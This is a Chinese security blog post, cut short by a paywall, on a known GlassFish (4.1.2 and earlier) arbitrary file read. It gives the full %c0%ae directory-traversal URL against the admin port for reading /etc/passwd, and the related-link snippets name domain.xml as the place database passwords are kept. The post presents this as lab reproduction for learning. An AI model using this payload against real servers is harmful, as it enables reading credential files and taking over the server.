中间件安全之GlassFish

最新推荐文章于 2024-05-02 16:12:12 发布
最新推荐文章于 2024-05-02 16:12:12 发布
阅读量348 收藏
点赞数
分类专栏: 中间件安全 文章标签: 安全 安全漏洞 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46085232/article/details/116678451
版权
本文探讨了GlassFish应用服务器的任意文件读取漏洞,该漏洞源于Java语言的解析问题,可能导致目录穿越。影响范围主要针对4.1.2版本及以下。通过特定URL可以访问敏感文件如/etc/passwd,甚至读取靶场环境下的docker-compose.yml。成功利用此漏洞可以配合读取密码登录GlassFish管理中心,进一步实现Getshell。
摘要由CSDN通过智能技术生成

中间件安全

GlassFish

GlassFish 是用于构建 Java EE 5 应用服务器的开源开发项目的名称。它基于 Sun Microsystems 提供的 Sun Java System Application Server PE 9 的源代码
以及 Oracle 贡献的 TopLink 持久性代码。该项目提供了开发高质量应用服务器的结构化过程,以前所未有的速度提供新的功能。
默认端口: 8080(Web 应用端口,即网站内容), 4848 ( GlassFish 管理中心)

任意文件读取漏洞

java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。
影响范围::<=4.1.2版本
1.访问https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd(注意操作系统)
在这里插入图片描述
2.这里我们去读靶场环境下docker-compose.yml(md读不了,真实环境应该是不会这样的),就用

最低0.47元/天 解锁文章
把小海蒂的名字还给我(师从小迪渗透)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 731
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
服务攻防-中间件安全&CVE 复现&Weblogic&Jenkins&GlassFish
m0_61506558的博客
12-19 556
(一)中间件-Weblogic安全(一)中间件-Weblogic安全探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器,检测工具,如下github链接2.cve_2018_2893 工具3.cve_2018_3245 工具4.cve_2020_14882 工具。
Glassfish JAVA容器中间件使用(咋个办呢 zgbn)
咋个办呢 zgbn
03-10 308
Glassfish JAVA容器中间件使用 安装Glassfish Glassfish官方下载页面:https://javaee.github.io/glassfish/download 下载GlassFish 5.0 - Full Platform版本。 下载后得到glassfish-5.0.zip,将其直接解压到目录下即可。 添加Glassfish到系统环境变量 进入加压后的Glassfi...
glassfish安全配置
矢志不渝,追求完美
05-23 1425
配置使用一个应用程序服务器例如glassfish,要考虑多方面的安全因素,供互联网访问之前,下边这些要修改: 修改管理员admin密码,默认的一般是adminadmin,使用一个随机生成的密码。 删除默认的服务器访问页面:install_dir>/domains/domain_name>/docroot/index.html 禁用目录列表,打开文件instal
glassfish--服务搭建
GP的空间
10-31 2689
集群配置: 1. DAS节点执行: 1)./asadmin start-domain domain1 2)./asadmin change-admin-password 3)./asadmin enable-secure-admin 4)./asadmin set configs.config.server-config.network-config.protocols.pr
深入浅出带你学习GlassFish中间件漏洞
老司机的后备箱
02-16 920
今天总结了一下GLASSFISH中间件的常见的攻击漏洞的利用手法,不知道大家有没有学会,可以看到GLASSFISH中间件由于解析特性的原因都可能存在漏洞,同时也有类似于WEBLOGIC部署WAR包的漏洞,还是值得我们认真学习一下的,如果喜欢本文希望可以一键三连支持一下。整理了一套《前端大厂面试宝典》,包含了HTML、CSS、JavaScript、HTTP、TCP协议、浏览器、VUE、React、数据结构和算法,一共201道面试题,并对每个问题作出了回答和解析。
几种常见web 容器比较 (tomcat、 jboss 、resin、 weblogic、 websphere、 glassfish
热门推荐
顺其自然~专栏
02-18 1万+
1. Tomcat是Apache鼎力支持的Java Web应用服务器,由于它优秀的稳定性以及丰富的文档资料,广泛的使用人群,从而在开源领域受到最广泛的青睐。- 2. Jboss作为Java EE应用服务器,它不但是Servlet容器,而且是EJB容器,从而受到企业级开发人员的欢迎,从而弥补了Tomcat只是一个Servlet容器的缺憾。- 3. Resin也仅仅是一个Servlet容器,然而由于它...
第61天-服务攻防-中间件安全&amp;CVE 复现&amp;K8s&amp;Docker&amp;Jetty&amp;Websphere
最新发布
2303_79055586的博客
05-02 1013
相关工具链接链接:https://pan.baidu.com/s/1a6Zt4e96rk87Kz0Gpzepig提取码:ospa。
glassfish任意文件读取漏洞-漏洞复现
m0_66376444的博客
04-15 369
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。执行POC进行任意文件读取linux下的/etc/passwd或者windows下的win.ini,成功读取。domains/domain1/config/domain.xml 各种数据库密码位置。三、GlassFish的敏感目录。
glassfish官方文档
07-31
glassfish官方文档
glassfish-3.1.2.2.zip
05-16
glassfish-3.1.2.2.zip上传根据需要使用,基于Java EE 6
GlassFish 管理配置
03-21
GlassFish服务器开源版本5.0管理指南,提供了配置和管理GlassFish服务器开源版本的说明。
GlassFish4(GlassFish3)安装
02-17
GlassFish4的下载和安装的详细步骤,下载地址,配置等。附带有GlassFish3的安装简述
glassfish基本使用
panda-star的博客
07-29 3346
glassfish基本使用 文章目录glassfish基本使用一、glassfish简介二、glassfish知识点2.1 domain三、glassfish安装3.1 下载3.2 解压四、domain创建4.1 进入安装的glassfish根目录4.2 创建domain4.3 启动domain4.4 查看domain4.5 注意4.5.1 修改端口号4.5.2 权限报错五、web部署5.1 通过浏览器管理页面部署5.2 命令行部署5.3 war包自动部署六、常用命令6.1 创建domain6.2 查看do
glassfish
qq_48843954的博客
05-04 390
1什么是:glassfish是一款web应用服务器 二domain domain是glassfish中,拥有独立端口的存放web应用的容器 1进入domain:D:\glassfish\glassfish-6.2.5\glassfish6\bin 2创建domain:asadmin create-domain 【domain名称】 创建domain时需要输入win用户的用户名和密码 创建后可在 glassfish-6.2.5\glassfish6\glassfish\domains下查看 3运
glassfish发布应用_Glassfish 3.1.2已发布
07-04 187
glassfish发布应用 自GlassFish 3.1系列开始以来,已有一年多的最新版本的Oracle开源Java EE 6应用程序和Web服务器。 与以前的版本完全兼容, GlassFish 3.1.2是七个月前的最新版本的显着改进,其中包含许多新功能,这些功能必将使开发人员更轻松。 正面解决了总计514个错误 ,主要是为了保持向后兼容性。 质量得到提升的大量外部技术包括SF / M...
GlassFish技术分析 之 开山第一篇
tibaloga
01-24 288
[GlassFish是什么] GlassFish来源于 Sun Microsystems 提供的 Sun Java System Application Server PE 9 的源代码以及 Oracle 贡献的 TopLink 持久性代码。 GlassFish的前身是Sun公司商业化的中间件服务器,正如我们所知的JBoss,Tomcat,WebLogic一样,用来部署和发布管理应用程序。...
glassfish任意文件读取漏洞(4.0/4.1)
3569
03-28 1916
相关厂商:glassfish漏洞编号:wooyun-2010-0144595漏洞详情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0...
Oracle GlassFish Server 3.1.2 管理指南
Oracle GlassFish Server 是一款由 Oracle 公司开发的开源应用服务器,属于中间件的一种,主要用于部署和管理Java应用程序,尤其是基于Java EE(Enterprise Edition)的应用。该服务器遵循Java EE规范,提供了一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值